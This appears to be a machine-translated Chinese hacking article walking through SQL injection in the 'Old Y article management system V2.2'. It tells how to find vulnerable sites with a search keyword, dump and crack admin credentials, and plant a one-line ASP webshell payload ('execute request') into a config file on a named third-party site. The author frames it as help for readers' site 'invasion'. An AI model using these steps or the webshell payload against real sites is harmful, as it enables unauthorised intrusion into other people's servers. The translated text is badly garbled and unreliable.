Old Y CMS system injection vulnerability analysis and exploit-vulnerability warning-the black bar safety net

ID MYHACK58:62200922690
Type myhack58
Reporter 佚名
Modified 2009-03-28T00:00:00


A friend asked me to help give them a company website, check the followingsecurity, in the promised friend. The author opens a friends company website, looked at it and found that with the old Y article management system V2. 2, The following will begin its further analysis.

Analysis of:the old Y article management system V2. 2

A pre-analysis

Since the system is a ASP+ACCESS, possible for us to say there are a lot of restrictions, not like MSSQL, MYSQL has so many extensions and built-in functions to use, actually like these asp, php, jsp dynamic site of the injection, a significant aspect is the need for a variety of database understanding. Next, we enter the old Y article management system-official website, see: www.laoy*. cn, just point A http://www. laoy*. cn/Class. asp? ID=4, and later added a comma, suggesting that the parameter is not illegal, is filtered, and the want to register a user look again, but the thought is an ACCESS database, even if the filter is not strict to insert the phrase to the database is also not much of a role, so it is still download the source code to the machine for further analysis.

II: vulnerability analysis

Since the code is not very much, we sequentially analyzed under the main file, using the regular expression((select|update|delete|insert)+. (from|set|into)+. (where)+.*) To search for relevant asp file, since access does not support multi-sentence queries, it can totally just search containing the keywords select the asp file, and then xinqing. asp find the following code:

Code highlighting produced by Actipro CodeHighlighter (freeware) http://www.CodeHighlighter.com/

- >action = Replace(Trim(Request. QueryString("action")),"'","") id = Replace(Trim(Request. QueryString("id")),"'","") typee = Replace(Trim(Request. QueryString("typee")),"'","") if action="show" then set rs=server. createobject("adodb. recordset") sql="Select * From Yao_XinQing Where cstr(ArticleID)="&id&"" rs. open sql, conn, 1, and 1 Omitted N more

I believe we can understand it, the id variable is just simply filtering the single quote will take into into the database, it is obvious to produce the injection, a simple analysis under the code means, and then to construct your own injection statement URL? action=show&id=3 1 7 here the id of the variable from the Yao_XinQing table find an existing value, and then placed into the injection tool can give the administrator user name and password, of course, also can use me to provide you with the tools, directly broke the administrator information, and then put the password to get to the www. cmd5. com to crack, the next thing is simple. Part Threewebcombat

1. Through a keyword search of the old Y article management system V2. 2

Since the“old Y article management system V2. 2”The presence of vulnerabilities, then quickly go to the network Battlefield to combat, since the official website has hit a patch of the latest version is V2. 3, so we find the right keywords with the“Powered by laoy8 V2. 2”, put Baidu to search, to find relevant pages about 3 to 4, 1 0 0, as shown in Figure 1.


Figure 1 through a keyword search of the old Y article management system V2. 2

  1. Preparatory work

Since the front of many sites has been hung it, we still try to choose slightly rearward of the site for testing, I used their space http://www. ibk528. com/to attempt, directly with the tool broke a username and password to login the backend, but found that the database backup is deleted, this can be what to do, suddenly thought since the configuration file(inc/config. asp)is an asp, so can not through the configuration information is written as a word Trojan, the said view of the lower Admin_Setting. asp, found that in addition to the ad1, ad2, ad3 no filter, the other parameters due to the filter in double quotation marks, then we use the ad1 parameters to be local to submit to the sentence the user Trojan toserver, 将后台的页面保存为admin_setting.htm as shown in Figure 2.


Figure 2 create“favorable conditions”

  1. Get the Webshell

Will be submitted to the address instead of http://www. ibk***. com/admin/Admin_Setting. asp? Action=Edit, the ad1 parameters set:

Code highlighting produced by Actipro CodeHighlighter (freeware) http://www.CodeHighlighter.com/

-->"%><% execute request("#")%><%"

Then click on submit, prompting the modification is successful, then use the client connection configuration file, use the pony to pass Malaysia by. Finally will get the Webshell truncated graph, as shown in Figure 3.


Figure 3

* Summary of experience

Nothing in this article advanced technology, here just want to remind everyone that in the absence of a database backup, we can use the configuration information to insert the word Trojan, I hope the usual invasion of the Site help a little, the above-mentioned website has been in the first patch, we do not go to test, if we found other vulnerability, also please heroes you show mercy, don't on my website on the hanging horse, in this Thank you.